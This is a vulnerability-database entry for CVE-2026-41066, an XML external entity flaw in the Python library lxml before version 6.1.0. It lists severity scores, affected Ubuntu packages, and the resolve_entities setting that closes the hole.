CVE Vulnerabilities

CVE-2026-41066

Improper Restriction of XML External Entity Reference

Published: Apr 24, 2026 | Modified: Apr 27, 2026
CVSS 3.x
N/A
Source:
NVD
CVSS 2.x
RedHat/V2
RedHat/V3
5.9 MODERATE
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Ubuntu
MEDIUM
root.io logo minimus.io logo echo.ai logo

lxml is a library for processing XML and HTML in the Python language. Prior to 6.1.0, using either of the two parsers in the default configuration (with resolve_entities=True) allows untrusted XML input to read local files. Setting the resolve_entities option explicitly to resolve_entities=internal or resolve_entities=False disables the local file access. This vulnerability is fixed in 6.1.0.

Weakness

The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

Affected Software

NameVendorStart VersionEnd Version
LxmlLxml*6.1.0 (excluding)
LxmlUbuntuesm-infra/xenial*
LxmlUbuntuquesting*
LxmlUbunturesolute*
LxmlUbuntuupstream*

Potential Mitigations

References